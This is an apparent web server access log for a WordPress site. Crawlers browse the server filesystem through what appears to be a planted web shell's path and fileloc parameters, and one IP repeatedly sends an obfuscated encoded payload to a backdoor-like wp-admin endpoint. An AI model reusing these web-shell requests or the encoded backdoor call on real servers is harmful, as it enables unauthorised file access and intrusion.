216.73.217.27 - - [10/May/2026:16:28:45 -0400] "GET /p/atom%2022207817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fedit-comments.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 10687 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:23:37 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383231372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343631372q3939613966626133666534363566643734623165633635313434383732383864222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
74.7.241.42 - - [10/May/2026:16:28:57 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/admin/dashboard/widget/welcome.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/admin/dashboard/widget HTTP/1.0" 200 6819 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/admin/dashboard/widget" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:29:16 -0400] "GET /p/beef%2031519826?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fdist%2Fvendor HTTP/1.0" 200 8172 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:24:16 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383235362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343635362q6361383263623737336363623430643430313163663638653933313839323963222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [10/May/2026:16:24:36 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383237362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343637362q6261386432383734316365616362653636343964653235313763386233373634222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:29:46 -0400] "GET /p/atom%2021391817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fmeta.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:29:48 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv/Iconv.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv HTTP/1.0" 200 11313 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [10/May/2026:16:24:56 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383239362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343639362q3330393034353136643761323661353662656337613331323033356332613537222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:30:06 -0400] "GET /p/atom%2022207817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fasync-upload.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 8817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:27:37 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383435372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343835372q3162376133353332633831313837373534383564383531346161346563343837222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [10/May/2026:16:25:16 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383331362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343731362q6236303531363364313130313664646661663866343766633930386361613837222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
74.7.241.42 - - [10/May/2026:16:30:32 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv/bootstrap80.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv HTTP/1.0" 200 7575 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:30:37 -0400] "GET /p/bale%2011423824?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fhome-link HTTP/1.0" 200 7038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:30:49 -0400] "GET /p/ball%2022651825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fzxcvbn-async.min.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs HTTP/1.0" 200 6867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:31:13 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv/LICENSE&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv HTTP/1.0" 200 7366 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:31:20 -0400] "GET /p/bale%2011423824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fmaint%2Frepair.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fmaint HTTP/1.0" 200 9235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:31:32 -0400] "GET /p/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fxmlrpc.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs HTTP/1.0" 200 7991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:31:42 -0400] "GET /p/bale%2010351824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-list-util.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 8781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:31:54 -0400] "GET /p/atom%2022255817?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fimgareaselect HTTP/1.0" 200 7213 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:32:06 -0400] "GET /p/bale%2010351824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fincludes%2Fclass-wp-screen.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fincludes HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:32:13 -0400] "GET /p/beef%2032195826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Frest-api.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:32:14 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/uwyKJTBfpzvWIn.ico&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items HTTP/1.0" 200 8978 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:32:25 -0400] "GET /p/atom%2022207817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fedit-form-advanced.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:32:35 -0400] "GET /p/ball%2021235825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-comment.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 9164 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:32:47 -0400] "GET /p/ball%2020715825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FID3%2Fmodule.audio.ac3.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FID3 HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:01 -0400] "GET /p/ball%2020135825?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FIXR HTTP/1.0" 200 7399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:04 -0400] "GET /p/beef%2031147826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-post.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 8310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:07 -0400] "GET /p/atom%2021391817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fcolor-picker-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 7357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:10 -0400] "GET /p/ball%2020715825?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fswfupload HTTP/1.0" 200 7144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:13 -0400] "GET /p/atom%2022255817?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblock-supports HTTP/1.0" 200 7821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:33:14 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/woocommerce/includes/shipping/legacy-local-pickup HTTP/1.0" 200 7042 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/woocommerce/includes/shipping" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:33:16 -0400] "GET /p/beef%2031147826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fimage%2Ftheme.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fimage HTTP/1.0" 200 6725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:27:57 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383437372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343837372q3766653564333565303335346439623037373235313731303466366565626431222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:33:19 -0400] "GET /p/ball%2020715825?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fpost-author-name HTTP/1.0" 200 7186 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:22 -0400] "GET /p/beef%2030099826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fgroup%2Ftheme.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fgroup HTTP/1.0" 200 6685 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:25 -0400] "GET /p/atom%2021559817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Frss.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks HTTP/1.0" 200 8342 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:28 -0400] "GET /p/atom%2021559817?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Faccordion HTTP/1.0" 200 7183 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:31 -0400] "GET /p/beef%2030695826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Ffeed-rss2-comments.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 8082 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:34 -0400] "GET /p/atom%2022255817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblock-template-utils.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 19952 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:28:17 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383439372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343839372q3039363337363162363938646564666239633038303535356434613335373462222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:33:37 -0400] "GET /p/atom%2021559817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fcategories.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks HTTP/1.0" 200 8443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:40 -0400] "GET /p/atom%2021391817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Ffeed-rdf.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 7627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:43 -0400] "GET /p/ball%2021235825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-image-editor.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 11412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:46 -0400] "GET /p/atom%2021391817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fphp.ini&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 6689 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:49 -0400] "GET /p/bale%2012027824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fipafb%2Fphp.ini&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fipafb HTTP/1.0" 200 6710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:52 -0400] "GET /p/ball%2022651825?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fpost-terms HTTP/1.0" 200 7183 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:33:55 -0400] "GET /p/bale%2012587824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fcustomize-nav-menus.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 10915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:28:37 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383531372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343931372q3033376133613233383834353339616633383337356231386339643538646235222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:33:58 -0400] "GET /p/beef%2030695826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-network.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 10399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:34:01 -0400] "GET /p/atom%2021391817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fcron.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 14977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
